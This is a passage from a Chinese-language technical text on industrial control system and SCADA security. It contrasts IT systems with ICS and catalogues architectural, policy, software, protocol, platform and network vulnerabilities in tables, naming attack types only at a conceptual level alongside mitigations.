工业控制系统的高可靠性、高可用性和可维护性,因此并不适用于工业控制系统。 3)风险管理需求 对于典型的IT 信息系统,数据的机密性和完整性是系统设计与开发过程中最 关注的问题。而对工业控制系统而言,人员安全和确保生命安全的故障容错率或 对公共安全及信心的危及程度、规章制度遵守情况、固定资产流失率、知识产权丢 失情况,以及产品遗失或损坏程度是工业控制系统的首要问题。负责设计工业控 制系统的技术人员,必须深刻理解工业控制系统功能安全和信息安全的关系。 4)系统结构安全 在传统的IT 信息系统中,信息安全首先解决的问题是保护 IT 资产的正常流 转,保护以集中或分布式的方式在资产中存储或传送的信息。在某些结构中,信息 集中存储和处理将更为重要并能获得更好的保护。而对于工业控制系统而言,由 于末端用户(如 PLC、操作站、DCS 控制器)直接完成控制和终端处理功能,因此终 端用户更需要得到特别的保护。当然在工业控制系统中对中心服务器的保护仍然 十分重要,因为中心服务器将反过来影响每一个终端设备的安全。 5)意外后果 工业控制系统与物理过程及物理事件在工业控制系统中所显示的结果有非常 复杂的联系。所有工业控制系统中集成的信息安全功能,必须事先经过测试并证 明这些功能不会影响正常的工业控制系统操作。 6)时间敏感型响应 在通常的IT 系统中,可以在不特别考虑数据流问题的情况下设计访问控制方 案,但对工业控制系统而言,对控制人员操作指令的自动响应时间或系统响应能力 非常关键。例如,在工业控制系统的人机交互界面中使用密码鉴别和认证过程,而 又不影响紧急情况处理流程,信息流必须不能被中断或停止。对这些系统的访问 必须受到严格的物理安全控制手段的限制。 7)系统操作 工业控制系统的操作系统和应用并不能完全兼容传统 IT信息系统的安全策 略,系统资源无效和定时中断对工业控制系统来说是特别严重的威胁。控制网络通常十分复杂,需要各类不同的技术专家进行维护(如控制网络一般由自动控制 工程师管理而不是IT 工程师),在控制系统网络中进行软件和硬件程序的升级或 更新是非常困难的工作。很多工业控制系统并没有传统 IT 信息系统中的常规信 息安全配置,如加密能力、错误日志和密码保护。 8)资源限制 工业控制系统及其使用的实时操作系统通常是资源受限的系统, 一般不包含 传统IT 信息系统的信息安全设施。工业控制系统的各部件中通常没有可以用来 满足加载现有信息安全技术的计算资源。此外,在一些情况下,由于工业控制系统 产品版权许可和安装第三方应用可能导致的技术支持缺失问题,工业控制系统的 设备中不允许使用第三方信息安全解决方案。 9)通信问题 工业控制系统的现场控制装置和现场通信使用的通信协议和传输介质与传统 IT 信息系统中的技术有所不同,大多数情况下是专用或私有的。 10)更新管理 更新管理是为确保IT 信息系统和控制系统完整性的一个极为重要的问题,更 新阶段会暴露出整个系统的巨大脆弱性。IT 信息系统的软件更新包括依据合适 的信息安全策略和步骤,并以及时方式安装的安全补丁。另外,补丁更新过程一般 使用服务器端的工具自动完成。而工业控制系统中的软件更新并不能总能及时进 行,原因在于更新的软件部分必须完全通过工业控制系统设备制造商和终端用户 的合法性测试,更为重要的是工业控制系统要临时停运,必须事先在数天/数周前 安排或计划好,整个工业控制系统运行体系的重新生效也是更新过程的重要内容, 并且更新管理同样涉及软件和硬件的可用性问题。最后,工业控制系统的更新管 理过程,需要工业控制系统专家、IT 信息安全技术人员一起进行周密策划与安排。 (1)可控的技术支持。传统 IT信息系统允许多样化的技术支持方式,这些方 式可以是完全不同的渠道或服务提供商,但它们之间可以支撑互相合作的技术服 务模式。在工业控制系统领域,技术支持通常只是一个独立的设备供应商,而该设 备供应商是不可能提供兼容多个设备供应商的多样化和具有互操作能力的技术支 持方案的。 (2)生命周期问题。传统 IT信息系统产品的生命周期一般只有3~5年,其 短暂性的原因在于IT 的快速发展。工业控制系统技术是为多种工业应用领域开 发的,并具有特殊用途和实现方式,因而工业控制系统中已经投运产品的生命周期 长达15~20年,甚至更长。 (3)对资源的访问。IT 信息系统资源可以从本地网络轻松访问,但工业控 制系统资源一般是远程物理隔离的,为了访问这些资源需要大量的人力、财力 资源。 表1.3对IT 信息系统和工业控制系统的主要区别进行了总结。 表1.3 IT 信息系统和工业控制系统主要区别 技术对比的方面 IT信息系统 工业控制系统 性能要求 (1)非实时; (2)响应是持续连贯的; (3)需要高吞吐率; (4)可以在一定程度上允许高的网络延 迟和阻塞 (1)实时系统; (2)时间敏感系统; (3)允许适当的吞吐率; (4)高网络延迟和阻塞是非常严重的问题 可用性要求 (1)允许重启等类型的响应; (2)可用性不足问题在一定程度上可以 被系统接受,取决于系统的运转要求 (1)绝不允许出现突发性系统重启,因为工 业控制过程的可用性要求严格; (2)系统中断需要预先在数天/数周前计划 和安排好; (3)高可用性目标要求预先拟定详尽的测试 方案 风险管理需求 (1)数据的机密性和完整性极其重要; (2)故障容错并不非常重要,瞬间中断 运行过程并不很严重的问题; (3)主要的风险在于可能给正常的商务 过程带来延迟 (1)人员安全极其重要,接下来才是对过程 的保护 ; (2)故障容错是非常关键的因素,甚至瞬间 中断运行过程也不允许; (3)主要的风险问题是将导致违反规章制 度,造成人生伤害、设备或产品损毁 系统结构 信息安全 (1)首先解决的问题是保护IT资产的 正常流转,保护以集中或分布式的 方式在资产中存储或传送的信息; (2)传统IT信息系统中的中央服务器 需要设计最完备的信息安全机制 (1)主要目的是为保护终端用户(如PLC、操 作站、DCS控制器); (2)对中心服务器的保护仍然十分重要 意外后果 所有信息安全机制都在IT系统中完 成设计过程 所有工业控制系统中集成的信息安全功 能,必须事先经过测试并证明这些功能不会 影响正常的工业控制系统操作 时间敏感型响应 (1)一般没有紧急情况交互过程; (2)根据应用需求可以部署分级、严格 的访问控制技术 (1)对控制人员操作指令的自动响应时间或 系统响应能力非常关键; (2)对这些系统的访问必须受到严格的物理 安全控制手段的限制,但又不妨碍人机 交互过程 系统操作 (1)系统被设计成运行于传统操作系 统 中 ; (2)系统更新可以直接通过软件自动 完成 (1)常规的工业控制系统一般不配置信息安 全措施 ; (2)软件的更新必须非常谨慎, 一般只能由 设备提供商完成,因为特殊的控制算法 甚至需要涉及软件和硬件改动 技术对比的方面 IT信息系统 工业控制系统 资源限制 系统具有足够的资源支持其他第三 方应用软件的更新过程,例如信息安全 机制 系统是专门为工业控制过程设计的,通常 没有可以用来满足加载现有信息安全技术 的计算资源 通信问题 (1)标准通信协议; (2)主要是有线网络,仅有少量无线通 信网络 ; (3)常规的IT互联网机制 (1)许多专用和标准的通信协议; (2)可以灵活使用多种通信介质,包括有线 和无线方式(包括超短波/短波通信和卫 星通信); (3)控制网络非常复杂,对控制网络进行操 作、维护,有时需要控制工程师的专家 意见 更新管理 当有更理想的信息安全策略和过程 出现时,软件更新将自动完成 软件更新前必须经过彻底的测试,并以逐 步进行的方式开展,目的是确保整个控制系 统的完整性。工业控制系统要临时停运,必 须事先在数天/数周前安排或计划好 可控的技术支持 允许多种方式的技术支持方式 设备的技术支持一般只能通过一个服务 提供商进行 生命周期问题 IT信息系统产品的生命周期一般只 有3~5年时间 工业控制系统中已经投运产品的生命周 期长达15~20年 对资源的访问 系统资源一般在本地,并可以轻松 访问 工业控制系统资源一般是远程物理隔离 的,为了访问这些资源需要大量的人力、财 力资源 第2 章 工业SCADA 系统的脆弱性和 安全威胁现状 2.1 工业 SCADA 系统的脆弱性 对于典型的工业 SCADA 系统,可以从以下几个角度研究其脆弱性: (1)体系架构脆弱性。 (2)安全策略脆弱性。 (3)软件脆弱性。 (4)通信协议脆弱性。 (5)策略和过程脆弱性。 (6)平台脆弱性。 (7)网络脆弱性。 1)体系架构脆弱性 体系架构的脆弱性直接源自 SCADA 系统的基本架构,现代工业系统所使用 的SCADA 架构,与20世纪80年代和90年代使用的架构相比, 一般在原则上是没 有太大区别(尽管有一些相关的技术改变了很多)。这不值得奇怪,源于下面几个 原因: (1)这些架构已经被测试过许多年,因此,众所周知它们是稳定的; (2)部署一个全新的架构成本,是不容忽视的; (3)从作业工程师和投资经理人的利益角度出发,目前还没有一个明确的改 变需求。 不幸的是,从“孤立”迁移到一个开放的环境,从串行通信到TCP/IP 通信, “传统的SCADA 架构”开始显示出了自己的局限性。作业工程师利用现成的信息 和通信技术,试图解决新的安全问题,却没有考虑到在一些特殊的情况下,SCADA 系统与传统的信息和通信技术的安全性限制不匹配。 典型的 SCADA 系统中,常见的体系架构脆弱性的例子如下[6]: (1)作业网络与现场网络之间的弱分离。由于现场网络是整个体系结构的内 部部分,通常还没有从作业网络中强分离,因为很显然, 一个攻击者是不太可能达 到这个领域的。然而, 一些研究表明了目标明确的入侵者可以很容易地到达到这 部分网络。 (2)SCADA 系统的活动组件之间缺乏认证(例如,执行的SCADA 服务器,执 行的 RTU,SCADA 数据交换服务器)。由于传统的现场网络总是处于封闭的环境 中,所以没有必要对网络上连接的不同元素之间,集成身份验证机制。然而当前不 是没有这种情况,缺乏身份验证意味着体系架构的漏洞,该漏洞可以很容易被利 用,用于完成进行任何形式的损害。 (3)单点的失败意味着需要防火墙隔离远程的单点故障或入侵。 (4)对网络负载均衡和冗余的较少关注。 2)安全策略脆弱性 一个体系架构健壮的系统,在任何情况下,脆弱性很难被操控,或者使用起来 很难受。换句话说,考虑系统的健壮性,需要提供技术和策略级的安全保护。虽然 通常来说,与SCADA 系统物理保护有关的安全策略可被很好地接受,并在工业系 统中实施,然而与作业网络中ICT 事务相关的安全策略却非常弱。 一般来说现行 策略的核心是从传统的“信息和通信技术办公室”复制而来的。在一些情况下,这 些策略的结果并不是最适合的作业环境,这使得简单操作可能忽略那些会影响他 们的日常工作的事件。可能存在下列安全策略的脆弱性。 (1)很少或不使用补丁策略。安全补丁很重要,特别是在Windows 操作系统 中。在 SCADA 系统中,很少能找到临时的补丁软件,补丁程序可能会对软件产生 严重的干扰。 一些补丁需要重新启动系统,才能有效,然而重新启动一个 SCADA 服务器,例如一个操作,可能会干扰生产系统的运行。出于这个原因,安全补丁策 略在作业网络中并不普遍。 (2)很少或不使用防病毒更新策略。杀毒软件可能影响SCADA 软件的运行, 此外,更新需要作业网络访问Internet, 或为主服务器分发新的签名,插入到架构 中。这两个操作都繁琐,因此更新的签名很少, 一般尽可能保持作业网络的隔离。 (3)松散的访问策略。通常访问策略规划得很好,但在现场实现却很糟(如 经典的附着在屏幕上的密码和登录数据)。在这种情况下,使系统失败的却是操 作登录指令的过程。 (4)缺乏统一的“系统演化跟踪档案”和缺乏迭代安全分析。作业和现场网 络通常在持续地演变。但这种演变通常缺乏很好的文档说明和分析。有关新服 务、新设备等信息会是真正有用的,可以确定新的脆弱性。此外,对基础设施的安 全评估通常被视为“一次性分析”,缺乏持续跟踪。 随着技术的发展,被发现的脆弱性的数量也迅速增加,目前被认为安全的系统,可能未来将变为不安全的。 3)软件脆弱性 这些脆弱性与缺乏严格的安全补丁策略密切相关。SCADA 系统中的一切行 为都是由软件管理的,不太可能保证一个软件完全“没有bug” 。软件脆弱性具有 潜在威胁,因为是潜在的,它们使得攻击者可以完全控制目标系统。本文不可能列 出SCADA 系统所有典型的软件脆弱性,由于这些系统不同,我们甚至不能列出目 前已知的软件脆弱性。然而,典型的、确定影响 SCADA 系统的漏洞有以下几种: (1)缓冲区溢出; (2)SQL 注入; (3)格式化字符串; (4)Web 应用程序漏洞。 4)通信协议脆弱性 大部分的工业 SCADA 系统协议,例如,Modbus 、DNP 、IEC60870-5-101 协议 是在很多年以前设计的,基于串行连接进行网络访问。当以太网连接成为广泛使 用的本地网络的物理连接层时,SCADA 协议可以基于 IP 协议之上实现(通常是 TCP 协议)。 工业 SCADA 系统协议缺乏保密和验证机制,特别缺乏验证一个主站和从站 之间发送的消息的完整性(如果原始消息内容已被攻击者修改,是很难被发现的) 技术,(例如,身份验证,授权和加密)因为原来的设计用于串行电缆。此外,工业 SCADA 系统协议也不包括任何不可抵赖性和防重放机制。 攻击者可以利用工业SCADA 系统的这些安全限制,肆虐工业控制系统, 一些 可能发生的攻击场景如下: (1)拒绝服务攻击。例如攻击包括模拟主站,向 RTU 发送无意义的信息,消 耗控制网络的处理器资源和带宽资源。 (2)中间人攻击。缺乏完整性检查的漏洞使攻击者可以访问到生产网络,修 改合法消息或制造假消息,并将它们发送到从站。 (3)重放攻击。安全机制的缺乏,使攻击者重复发送合法的工业 SCADA 系统 消息,并将它们发送到从站设备,从而造成设备损毁、过程关闭等破坏。 (4)欺骗攻击。向控制中心操作人员发送虚假的、欺骗信息,导致操作中心不 能正确了解生产控制现场的实际工况,诱使其执行错误操作。 (5)修改控制系统装置或设备的软件,导致发生不可预见的后果。 防火墙和入侵/异常检测系统可以抵御针对 Modbus 漏洞的攻击。然而,绕过 这些安全控制总是可能的。解决面临的安全威胁最好的办法是在最开始的时候解 决这些问题 通过尝试“修复”工业控制系统协议的安全漏洞。但是,这样的解 决方案是难以实现的,因为它可能会对控制系统的结构、配置、操作流程进行巨大的改变。 5)策略和过程脆弱性 工业控制系统使用过程中一些不完整、不正确或一些根本不存在的信息安全 文件,包括配置策略和执行导则(流程)等。信息安全文件及其相应的管理方案, 是任何信息安全方案的核心内容。 一体化的信息安全策略可以通过在调制解调器 和工业控制系统的连接过程中强制使用或配置密码的方式,来确保降低工业控制 系统的脆弱性。表2.1 列举了工业控制系统策略和流程中可能存在的潜在脆弱性。 表2.1 策略和过程中的脆弱性 脆弱性 详 细 描 述 工业控制系统中不适当的 信息安全策略 不适当的配置或缺少特别适用于控制系统信息安全的策略通常导致 工业控制系统的脆弱性 缺少工业控制系统信息安 全培训和意识培养方面的 项 目 那些正规的信息安全培训和意识培养方面的项目可以帮助员工不断 地系统性更新信息安全策略和流程,以及工业信息安全标准和更好的措 施。然而如果缺少专门针对工业控制系统策略和流程方面的培训,员工 是不可能维护安全可靠的工业控制系统的 不适当的信息安全架构和 设计方案控制系统工程师一般缺乏信息安全方面的专业培训,并且直到现在, 大多数能源工业企业也没有在其产品中包含信息安全方面的技术措施 没有专门为工业控制系统 专门设计的信息安全方面的 专业性的系统性流程 必须为工业控制系统开发专用的、总体性的信息安全流程,该流程是 其他所有信息安全措施的基础 工业控制系统遵循的运转 规范效率低甚至缺乏合理的 运行管理流程 设备运行规范必须持续不断地更新并具有很好的易用性,这些规范或 导则应该成为工业控制系统事故处理流程的一个重要组成部分或环节 缺乏信息安全机制实施方 面的管理机制 员工应该对信息安全策略和流程的管理及执行过程负责 缺乏或者只有很少的关于 工业控制系统信息安全方面 的审计机制 独立的信息安全审计机制可以评价或检验工业控制系统的日志记录,并 确认对工业控制系统运行控制操作的合理性,以此确保工业控制系统的运 行与控制过程符合信息安全策略与流程的要求。审计过程也可以发现违 背工业控制系统信息安全服务原则的环节或问题,从而促进管理者提出改 进措施,最终使已有的信息安全控制策略更加健壮并能不断更新完善 没有针对工业控制系统不 间断操作或灾难恢复机制 (DRP) 灾难恢复能力是发生硬件或软件错误以及设备损毁时必不可少的机 制。如果缺少专门的灾难恢复机制,将导致工业控制系统发生事故时产 生长时间的处理延迟 缺少专门针对工业控制系 统的配置更新管理 对硬件、软件、整机和技术规范的修改过程需要严格控制与管理,以此 防止工业控制系统受到不恰当、不正确的配置修改。缺少配置更新管理 过程将导致工业控制系统处于高风险状态 6)平台脆弱性 工业控制系统的脆弱性通常由系统缺陷、错误配置或对设备平台(包括硬件、 操作系统和工业控制系统应用程序)的错误操作使用引起。这些脆弱性可以通过 部署多种不同的信息安全措施得以减少,这些措施如操作系统和应用程序的修补, 物理层访问控制以及信息安全软件(如杀毒软件)。 表2.2列出平台配置不当产生的脆弱性;表2.3列出硬件脆弱性硬件平台的 脆弱性;表2.4列出软件脆弱性软件方面的脆弱性;表2.5列出对恶意软件的防护 脆弱性恶意软件防护方面的脆弱性。 表2.2 平台配置脆弱性 脆弱性 详 细 描 述 操作系统和用户的应用 软件在没有发现明显的脆 弱性之前,是不可能进行开 发的 因为工业控制系统软件的复杂性和可能给其运行的操作系统环境带来 的修改,工业控制系统软件的任何变化都必须经过全面的回归测试。但是 由于此类回归测试和后续大规模分布式软件升级过程所耽误的时间,将成 为一个很长的、引发脆弱性的窗口期 没有对操作系统和应用 程序的信息安全进行及时 地升级打补丁操作 长期未升级打补丁的操作系统和应用程序,可能隐藏新的、未被发现且 极易造成破坏的脆弱性,需要对工业控制系统信息安全补丁操作及维护过 程制定规范 操作系统和应用程序的 信息安全补丁在升级前未 经过详尽测试 操作系统和应用程序的安全补丁在安装前没经过详细测试,将危及工业 控制系统的正常运转,必须制定测试新的安全补丁过程的规范 经常使用缺省配置 使用缺省的配置通常导致开放主机上那些不安全、不必要的端口,容易被利用的服务和应用程序等关键性配置没有保存或 备份 事故发生后可以对工业控制系统参数配置进行及时恢复,或者对系统进 行重要配置时,可以继续保持系统的可用性并防止数据丢失。开发确保工 业控制系统配置参数可用性的规范操作流程是非常重要的 便携式设备的数据没有受到保护如果敏感数据(如密码,拨号数字等)完整地存储在便携式设备(如膝上型计算机、PDA等)中,并且此类设备遗失或被盗,将危及整个系统的信息 安全。出现此类情况时,为保护敏感数据的安全性,需要设计配套的策略、 过程和机制缺乏恰当的密码管理 机制 当系统中需要使用密码时必须设计正确的密码管理策略,密码管理机制 越健全,密码使用过程将受到越充分的保护。缺乏恰当的密码管理机制, 整个系统将不可能对密码进行合理的控制,极易引发对系统的非授权访问。密码管理机制必须作为整个工业控制系统信息安全体制的重要组成 部分,并需要考虑工业控制系统处理复杂密码的能力 ( 续 ) 脆弱性 详 细 描 述 不使用密码 工业控制系统的每种功能部件需要使用密码来阻止非授权的访问,如果 不使用密码将导致一些与密码相关的脆弱性: ①系统登录过程(如果系统具有用户账号); ②系统启动过程(如果系统没有用户账号); ③系统屏幕保护(如果工业控制系统是无人值守的) 口令破解 口令需要被秘密保存以防止非授权访问,口令破解的例子包括: ①口令被简单记录在工业控制系统设备周围那些显眼的位置; ②将口令告诉每一个系统的使用者; ③以社会工程的途径将密码告诉恶意攻击者; ④通过未经过保护的通信信道传送未加密的口令 口令猜测 未经过认真设计的口令很容易被攻击者或计算机算法猜测出来,并获得 对系统的非授权访问,这方面的例子包括: ①简短、简单(如使用相同字母)的口令,或者不满足常规安全长度的口 令,但口令长度取决于具体的工业控制系统设备能处理的口令的长度; ②使用设备供应商默认提供的口令; ③口令长期不修改 使用不合理的访问控制机制设计不合理的访问控制机制将导致赋予一个普通的工业控制系统用户 太多或过少的访问权限。 ①使用系统的缺省配置将使系统操作者拥有管理员权限; ②系统不合理的配置将导致系统操作者不能在紧急情况下采取正确的应 急补救措施。 访问控制策略需要作为工业控制系统信息安全流程的组成部分进行 设计 表2.3 硬件脆弱性 脆弱性 详 细 描 述 针对安全更新的测试不 充分 许多工业控制系统设备,特别是小型设备,没有专门的测试工具,于是系 统的安全更新必须在已投运的系统中进行在线安装 针对关键系统的物理保 护不全面 对控制中心、现场装置、便携式设备、电子装置和其他工业控制系统部件 的访问需受控,很多远程站点没有合法网络用户身份,而其访问过程没有 被监视非法用户对设备的访问 对工业控制系统设备的访问必须仅限于必要的合法用户,原因在于安全 需求,例如紧急情况中的关闭或重启操作。对工业控制系统的非法访问将 导致发生以下问题: ①丢失系统数据或设备硬件; ②系统数据或设备硬件的物理损毁或破坏; ③非授权地改变系统功能运行环境(如数据连接、非授权使用移动存储介 质、添加/移动系统资源); ④中断数据连接; ⑤无法察觉地拦截或侦听数据(拦截键盘敲击过程和其他输入方式) 对工业控制系统组件的 非法远程访问 调制解调器和其他远程访问手段使得控制系统工程师和产品提供商可 以远程访问系统,而这种访问能力必须受到信息安全机制的控制,防止非 授权用户可以访问工业控制系统 网络中存在的双网卡 配置 使用双网卡连接不同网络的机器允许存在非授权访问网络以及在不同 网络间相互传输数据的情形 对工业控制系统资产的 标识不规范 为保护工业控制系统的信息安全,需要精确地列举系统中的资产,对控 制系统及其部件的不正确标识,将在工业控制系统中留下非授权访问点或 后门程序 无线电频率和电磁脉冲 控制系统中的硬件存在无线电频率和电磁脉冲方面的脆弱性,可以引发 控制指令的短暂中断,甚至导致电路板的永久破坏 没有安装备用电源 工业控制系统中的关键部位没有安装备用电源,系统的掉电事故将关闭 整个工业控制系统并可能触发进入不安全状态,系统掉电事故还可能引起 系统恢复不安全的缺省配置 缺少温度保护措施 缺少温度保护机制将导致处理器过热,在过热情况下, 一些处理器将停 止运行以保护自己,而一些处理器过热将熔解 缺少关键部件的冗余 备份 缺少对关键部件的冗余备份,将使单点故障引发整个系统瘫痪 表2.4 软件脆弱性 脆弱性 详 细 描 述 缓冲区溢出 构成工业控制系统的软件大多具有缓冲区溢出的脆弱性,攻击者 可以利用这些脆弱性实施各种攻击 已经安装的信息安全技术措施 被缺省禁用 设备产品中安装的所有信息安全机制,如果被配置成禁用或在实 际操作中受到限制时,将失去作用 拒绝服务 工业控制系统软件很容易遭受拒绝服务攻击,导致用户不能正常 访问系统资源或被瘫痪了 脆弱性 详 细 描 述 未定义、不完善或非法条件导致 违反运行规程的操作 一些工业控制系统在运行操作过程中,很容易受到畸形数据包或 含有非法或异常现场数据报文的干扰 用于过程控制的对象链接与嵌 入技术(OPC)依赖远程过程调用 (RPC)和分布式组件对象模型 (DCOM)存在很多脆弱性 由于缺乏有效的补丁更新机制,OPC很可能受到著名的RPC/ DCOM脆弱性威胁 工业控制系统中大量使用不安 全的控制协议 分布式网络协议(DNP)3.0、Modbus、Profibus以及IEC有关协议 等在工业控制系统中应用普遍,并且其协议有关信息可以很容易从 各种渠道获取,这些协议只有很少的信息安全措施或根本没有安全 防护机制 使用非加密报文 大多数工业控制系统协议在通信信道中使用明文传输协议报文, 恶意攻击者很容易监听并分析报文内容 系统中运行一些不必要的服务 工业控制系统设备平台也许缺省配置具有很多不同类型的处理 器和网络服务,而那些不需要的服务一般很少被禁用,容易被恶意 攻击者利用 经常使用专用软件,而这些软件 已经在各种技术研讨会或期刊杂 志上讨论过 工业控制系统专用软件问题已经在工控网领域的国际会议(包括 “黑帽”大会)上讨论过,并可以在很多技术文献和期刊杂志中找到 相关材料。并且,控制系统的用户使用手册等技术材料可以很容易 从设备提供商处获取。这些信息可以帮助恶意攻击者成功实施针 对工业控制系统的攻击行动 设备配置和软件开发过程中并 不充分的鉴别和访问控制机制 设备配置和软件开发过程中未经授权的访问,可能导致设备破坏 未安装入侵检测/人侵防御软件 工业控制系统事故将导致系统失去可用性,造成系统数据的失 窃、修改、删除,以及设备执行不正确的控制指令。人侵检测/入侵 防御软件将阻止或防御多种不同类型的攻击,包括拒绝服务攻击 并可以定位已经受到攻击的内网主机,例如那些已经感染病毒的主 机。入侵检测/入侵防御软件在安装前必须事先经过严格测试,以 确保安装入侵检测/入侵防御软件后不会危及工业控制系统的正常 运转 没有定期维护日志 如果系统中没有正确和及时的日志,不可能追查是什么原因导致 信息安全事故发生 不能及时察觉安全事件 尽管安装了日志和其他信息安全检测工具,但它们并不能对系统 进行实时监视,因而安全事件并不能被快速检测和处理 表2.5 对恶意软件的防护脆弱性 脆弱性 详 细 描 述 未安装防病毒软件 恶意软件将导致系统性能下降,失去正常功能,系统数据的失窃、修改、 删除等破坏。防病毒软件,例如杀毒软件可以用来保护系统不受病毒感染 防病毒软件未及时更新 过时或失效的防病毒软件和策略将使系统容易遭受新病毒的攻击 防病毒软件在安装前未 经过全面测试 防病毒软件在安装前未经过全面测试有可能影响工业控制系统的正常 运转 7)工业控制系统网络脆弱性 工业控制系统网络和与之相连的其他的网络的缺陷、错误配置或不完善的网 络管理过程可能导致工业控制系统的脆弱性,这些脆弱性可以通过各种不同类型 信息安全措施,例如深度防御的网络规划设计、加密网络通信过程、控制网络流量 以及对网络元素的物理访问过程进行控制等手段得以控制或减少[8]。 表2.6列出网络配置不当产生的脆弱性;表2.7列出网络硬件脆弱性;表2.8 列出网络边界脆弱性;表2.9列出网络监视和日志方面存在的脆弱性;表2.10列 出通信方面的脆弱性通信脆弱性;表2.11列出无线连接过程的脆弱性。 表2.6 网络配置不当引发的脆弱性 脆弱性 详 细 描 述 弱网络安全架构 工业控制系统中的基础设施网络环境经常随着商务活动和操作运行的 需求改变而不断修改和完善,但在此过程中极少考虑这些变化对系统的潜 在的安全方面的影响。随着时间的延续,信息安全问题将在网络环境的特 定部分不断累积,如果不及时打补丁,这些安全问题将成为工业控制系统 中的后门 没有严格进行数据流 控制 数据流控制机制,例如访问控制列表(ACL),可以用来明确限定哪些系 统可以访问网络设备。 一般情况下只有网络管理者可以直接访问网络设 备,数据流控制机制将确保其他系统不能直接访问设备 IT设备中不全面的信息 安全配置 使用出厂设备的缺省配置通常导致开放不安全、不必要的端口,并暴露 出主机上可被利用的服务。不正确地配置防火墙策略和路由器访问控制 列表将在网络中产生很多不必要的流量 网络设备的配置没有被 存储或备份 发生事故或出现由敌对分子造成的配置改变的情形时,必须有恢复网络 设备配置的技术机制,以确保系统的可用性并保证数据不会遗失。需要设 计规范的流程确保网络设备的配置可以被存储和备份 登录口令在传输过程中 没有进行加密 登录口令以明文形式在通信介质中传输时非常容易被恶意攻击者监听, 恶意攻击者可以利用监听到的口令获取对网络设备的非法访问。此类非 法访问过程将允许恶意攻击者中断工业控制系统运行,或者非法监视工业 控制系统的网络行为 (续) 脆弱性 详 细 描 述 登录口令被简单地保存 在网络设备中 登录口令需要周期性地更换,以至于如果一个口令被非法用户掌握时 该非法用户只能在短时间内对网络设备进行未授权访问。这种非法访问 有可能使恶意攻击者有条件中断工业控制系统正常运行或非法监听工业 控制系统的敏感数据 不合理的访问控制机制 恶意用户对网络设备和管理员功能的非授权访问将导致用户可以随意 中断工业控制系统的正常运转,或非法监听工业控制系统的敏感操作 表2.7 网络硬件脆弱性 脆弱性 详 细 描 述 对网络设备的物理保护 不完备 网络设备的访问将受到严格控制以防止发生破坏或中断事故 不安全的物理端口 不安全的通用串行总线(USB)和PS/2端口可以允许非授权连接小型驱 动器、键盘记录器等 缺少温度保护措施 缺少温度保护机制将导致处理器过热,在过热情况下, 一些处理器将停 止运行以保护自己,而一些处理器过热将溶解 外部人员可以访问工业 控制系统的设备和网络 连接 对工业控制系统网络设备的物理访问必须仅限于合法员工,外部人员非 法访问网络设备将导致发生以下问题: ①工业控制系统设备硬件和敏感数据遗失; ②工业控制系统设备硬件和敏感数据破坏或损毁; ③非授权更改信息安全配置(例如,改变访问控制列表配置,允许攻击者 入侵网络); ④非法中断和控制网络行为; ⑤断开数据连接 控制网络使用非常规的 控制网络服务 控制系统网络中使用了传统IT信息系统中常用的DNS、DHCP服务,将 导致工业控制系统网络一定程度上依赖传统IT信息系统网络,但是传统 IT信息系统网络却不能完全提供工业控制系统所需的实时性和可用性 对网络关键部位缺乏冗 余备份机制 对网络关键部位缺乏冗余备份机制将导致当网络中的一个节点发生故 障时会,引起全网瘫痪 表2 .8 网络边界脆弱性 脆弱性 详 细 描 述 没有严格界定网络边界 范围 如果控制系统网络没有严格界定清晰的网络边界,将不能保证在网络中 部署必要的信息安全控制措施。将导致对系统和数据的非法访问,以及相 关的其他问题根本没有配置防火墙或 配置不当 缺乏正确配置的防火墙将造成不必要的数据流量在网络间传输,例如控 制和调整网络的指令。这种情况将导致很多问题,包括使得攻击行为和病 毒可以在网络间传导,导致敏感数据容易遭受其他网络用户的监视/窃取, 并使得独立的用户可以非授权访问网络 在控制系统网络中传输 完成非控制任务的信息 控制信息和非控制信息流量有很多不同的要求,例如独占性和可靠性。 将两种类型的流量放在同一个网络上,使得更加难以配置网络,以致需要 设计流量控制机制。例如,非控制信息将可以随意占用本应该提供给控制 指令流量的网络资源,导致工业控制系统功能异常 表2 .9 网络监视和日志方面存在的脆弱性 脆弱性 详 细 描 述 没有完整的防火墙和路 由器的日志 没有完整和正确的日志记录,将不可能追查安全事故是如何发生的 在工业控制系统网络中 缺少网络安全监视 如果没有对工业控制系统网络的安全状态进行常规监视,将不能及时发 现安全事故,可能导致不必要的损毁或破坏。常规的网络安全监视也需要 识别信息安全控制方面的问题,例如配置错误和缺省配置问题 表2.10 通信方面的脆弱性 脆弱性 详 细 描 述 重要的监视和控制路径 没有进行标识 对工业控制系统的恶意及匿名连接将为攻击留下后门 标准的、定义得很规范的 通信协议以明文形式应用 那些非法监视工业控制系统网络活动的入侵者可以使用协议分析工具 或其他工具还原在网络传输的协议(如telnet、FTP和NFS)内容。同样,使 用这些协议的工业控制系统更容易遭受网络攻击,并有可能操纵网络行为 对用户、数据和设备的认 证过程不规范或根本没有 大多数工业控制系统协议在任一层次都缺乏认证机制,缺乏认证机制, 就可能导致重放、修改或欺骗网络数据以及欺骗类似传感器和用户身份等缺乏通信过程的完整性 校验。很多工业控制系统专用协议中没有完整性校验机制,入侵者可以在不被 察觉的情况下操纵通信过程。为了确保完整性,工业控制系统可以使用较 低层次的协议(如IPsec)为数据提供完整性保护能力 表2.11 无线连接过程的脆弱性 脆弱性 详 细 描 述 客户和访问站点之间的 认证机制不完善 无线客户端和访问站点之间健全的相互认证机制,可以确保客户端不会 错误地连接恶意攻击者提供的流氓访问站点,并保证攻击者不可能连接工 业控制系统无线网络的任何部分 无线客户和访问站点之 间缺乏完善的数据保护 手段 无线客户和访问站点之间传输的敏感数据需要使用高强度的密码进行 保护,以确保攻击者不能获取对未加密数据的非授权访问 2.2 工业控制系统威胁与风险分析 目前有许多原因可能导致工业控制系统的风险不断增加,主要有以下几个 方面: (1)采用那些存在已知脆弱性的标准协议和技术; (2)将控制系统网络与其他网络相连; (3)与不安全的或者流氓网络连接; (4)可以从很多公开渠道获取工业控制系统技术细节。 1)标准协议和通用技术的风险 工业控制系统设备供应商已逐渐向公众开放其私有协议,并将这些协议出版 发行出来,目的是使第三方设备制造商可以开发相互兼容的产品。同时,工业控制 系统设备制造商们也调整转变产品研发思路,尽量使其新研发的产品成本更低,并 尽可能地使用标准技术如Microsoft Windows 和类似 Unix 的操作系统、通用网络协 议如TCP/IP 等,降低成本和提高性能。另一个促进形成这种开放系统转变的标 准是 OPC(用于过程控制的对象链接与嵌入技术),OPC协议使得工业控制系统可 以直接与PC 上的应用程序交互。工业控制系统设备制造商使用开放、标准协议 的转变过程提供了更多的经济性和技术优势,但同时也增加了工业控制系统面临 